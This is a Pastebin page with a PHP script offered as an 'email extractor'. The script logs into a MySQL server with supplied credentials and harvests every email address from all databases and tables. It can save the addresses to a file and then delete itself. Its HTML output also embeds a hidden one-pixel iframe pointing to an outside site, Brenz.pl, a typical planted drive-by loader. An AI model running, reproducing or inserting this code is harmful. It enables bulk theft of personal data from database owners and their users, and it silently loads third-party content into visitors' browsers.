Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @set_time_limit(0);error_reporting(0);
- echo '<html><head><title>GET EMAIL WEBSITE</title></head><body><center><pre id="sbz">Email extractor by T3N38R15</pre><div class="box" align="left"><center>';
- if(!empty($_GET["rm"])){unlink('emails.txt');unlink(basename($_SERVER['PHP_SELF']));echo '<script> alert("email file deleted");window.location="' . $_SERVER["PHP_SELF"] . '";</script>';}
- if(!empty($_POST["server"])){
- $vr=false;if(!empty($_POST["filesf"])){if($_POST["filesf"]=="on"){$vr=true;}}
- if($vr==true){ignore_user_abort(true);$fh = fopen("emails.txt", 'w') or die("can't open file " . getcwd() . '/emails.txt');}
- mysql_connect($_POST["server"], $_POST["user"], $_POST["pw"]) OR die("not connected");
- $res1 = mysql_query("SHOW DATABASES");
- echo '<textarea style="width:98%;" rows="25">';
- while ($row1 = mysql_fetch_assoc($res1)) {
- $res2 = mysql_query("SHOW TABLES FROM " . $row1['Database']);
- while ($row2 = mysql_fetch_assoc($res2)) {
- $res3 = mysql_query("SHOW COLUMNS FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]);
- while ($row3 = mysql_fetch_assoc($res3)) {
- if(strstr($row3['Field'], "email")) {
- $res4 = mysql_query("select " . $row3['Field'] ." FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]);
- while ($row4 = mysql_fetch_assoc($res4)) {if(!empty($row4[$row3['Field']])){if(strstr($row4[$row3['Field']], "@")){echo $row4[$row3['Field']] . "\n";if($vr==true){fwrite($fh, $row4[$row3['Field']] . "\n");}}}}
- }
- }
- }
- }
- echo '</textarea>';
- if($vr==true){fclose($fh);echo '</br><a href="emails.txt">Click Sini Hasil Extractor!</a><span style="padding: 0 20px;"></span><a href="' . $_SERVER["PHP_SELF"] . '?rm=1">Hapus File Email</a>';}
- }else{
- echo '<form method="POST"><table><tr><td>Server : <input type="text" name="server" value="localhost"\></td></tr><tr><td>User : <input type="text" name="user" value="root"\></td></tr><tr><td>Password : <input type="text" name="pw" value=""\></td></tr><tr><td>Save-to-file : <input type="checkbox" name="filesf"\></td></tr><tr><td><input type="submit" value="send"\></td></tr></table></form>';
- }
- echo '</center></div></center><iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
- </body></html>';
- ?>
Add Comment
Please, Sign In to add comment